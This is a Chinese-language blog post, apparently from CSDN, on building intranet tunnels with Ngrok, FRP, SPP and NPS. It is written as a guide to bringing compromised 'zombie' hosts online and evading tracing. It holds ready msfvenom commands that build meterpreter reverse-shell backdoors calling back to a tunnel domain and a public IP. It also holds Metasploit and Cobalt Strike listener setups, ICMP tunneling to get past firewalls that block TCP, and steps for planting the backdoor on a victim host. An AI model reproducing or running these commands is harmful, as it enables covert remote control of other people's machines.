内网安全-隧道搭建&穿透上线&FRP&NPS&SPP&Ngrok&EW项目

旨在代理连接肉鸡后实现本地渗透肉鸡网络架构

Linux:Proxychains

Windows:Sockscap Proxifier

穿透项目:Ngrok Frp Spp Nps EW(停更)

优点:穿透加密数据,中间平台,防追踪,解决网络问题

https://www.ngrok.cc

https://github.com/esrrhs/spp

https://github.com/fatedier/frp

https://github.com/ehang-io/nps

http://www.rootkiter.com/EarthWorm

#内网穿透-Ngrok-入门-上线

https://www.ngrok.cc/

支持的协议:tcp、http、https

支持的类型:正向代理、反向代理

1、服务端配置:

开通隧道-TCP 协议-指向 IP 和端口-开通隧道-连接隧道

2、客户端(攻击者主机)连接服务端:

./sunny clientid 133328291918(隧道id) //控制端连接 Ngrok 的服务器

将下图的内容上传到攻击者主机,

3、客户端生成后门配置监听:

注意生成的是tcp协议后门,生成木马是使用的是ngrok平台提供的域名

msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com lport=10134 -f exe -o ngrok.exe

use exploit/multi/handler

set payload windows/meterpreter/reverse_http

set lhost 0.0.0.0

set lport 2222

run

攻击者主机使用隧道号与平台建立连接,受害者主机点击后门之后,反向连接ngrok平台提供的域名,流量经过转发到攻击者主机上,实现内网穿透。

攻击者主机打开msf开启监听,监听端口是刚生成隧道的本地端口2222,然后服务器点击木马即可上线

#内网穿透-Frp-简易型-上线

https://github.com/fatedier/frp

frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS

等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公

网。

自行搭建,方便修改,成本低,使用多样化,适合高富帅及隐私哥哥们

1.服务端-下载-解压-修改-启动(阿里云主机记得修改安全组配置出入口)

服务器修改配置文件 frps.ini:

[common]

bind_port = 7000

启动服务端:

./frps -c ./frps.ini

看我这篇文章详细介绍使用

frp搭建隧道-CSDN博客

内网穿透-Spp-特殊协议-上线

https://github.com/esrrhs/spp

支持的协议:tcp、udp、udp、icmp、http、kcp、quic

支持的类型:正向代理、反向代理、socks5正向代理、socks5反向代理

在对抗项目中有遇到过一些极端环境,比如目标封了tcp,http等常用出网的协议,

但是icmp,dns等协议可能因为业务需要或者管理者安全意识不到位导致没有封干净。

在这种场景下就可以使用这些容易被忽视的协议进行隧道的搭建。

防火墙对tcp的出站封杀,然后我们这里利用spp这个项目把tcp封装成icmp出网,icmp协议到攻击机成功上线

1、服务端: 监听本地icmp流量

./spp -type server -proto ricmp -listen 0.0.0.0

2、客户端: 将本地8082端口流量转发至47.94.236.117 8081端口上(TCP封装成ICMP)

spp -name "test" -type proxy_client -server 47.94.236.117 -fromaddr :8082 -toaddr :8081 -proxyproto tcp -proto ricmp

3、CS

监听器1:http 47.94.236.117 8081

监听器2:http 127.0.0.1 8082

生成后门:监听器2

将后门上传至受害者主机执行

内网穿透-nps-特殊协议-上线

内网渗透---隧道搭建&SPP与NPS内网穿透_spp代理上线cs-CSDN博客

注意服务端与客户端版本一致

nps默认配置文件使用了80,443,8080,8024端口

80与443端口为域名解析模式默认端口

8080为web管理访问端口

8024为网桥端口,用于客户端与服务器通信 默认账号密码:admin/123

1、启动

./nps install

./nps

访问vps的8080端口,默认账号密码:admin/123

2、创建客户端,生成密匙

3、添加协议隧道,绑定指向

-客户端:

1、连接服务端:

bash 复制代码
./npc -server=47.94.236.117:8024 -vkey=uajwhbu9155qh89v  #创建客户端后自动生成密钥

2、生成后门:

bash 复制代码
msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117 lport=5566 -f exe -o nps.exe

3、监听后门:

攻击者监听自己电脑本地的6666端口

bash 复制代码
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 6666
run
相关推荐
l1x1n04 小时前
No.2 笔记 | 网络安全攻防:PC、CS工具与移动应用分析
安全·web安全
醉颜凉6 小时前
银河麒麟桌面操作系统V10 SP1:取消安装应用的安全授权认证
运维·安全·操作系统·国产化·麒麟·kylin os·安全授权认证
小小工匠10 小时前
Web安全 - 路径穿越(Path Traversal)
安全·web安全·路径穿越
不灭锦鲤13 小时前
ssrf学习(ctfhub靶场)
网络·学习·安全
网络研究院15 小时前
如何安全地大规模部署 GenAI 应用程序
网络·人工智能·安全·ai·部署·观点
DonciSacer19 小时前
TryHackMe 第6天 | Web Fundamentals (一)
安全
云卓科技1 天前
无人机之数据提取篇
科技·安全·机器人·无人机·制造
山兔11 天前
工控安全防护机制与技术
安全
HEX9CF1 天前
【CTF Web】Pikachu xss之href输出 Writeup(GET请求+反射型XSS+javascript:伪协议绕过)
开发语言·前端·javascript·安全·网络安全·ecmascript·xss
小小工匠1 天前
加密与安全_HOTP一次性密码生成算法
算法·安全·htop·一次性密码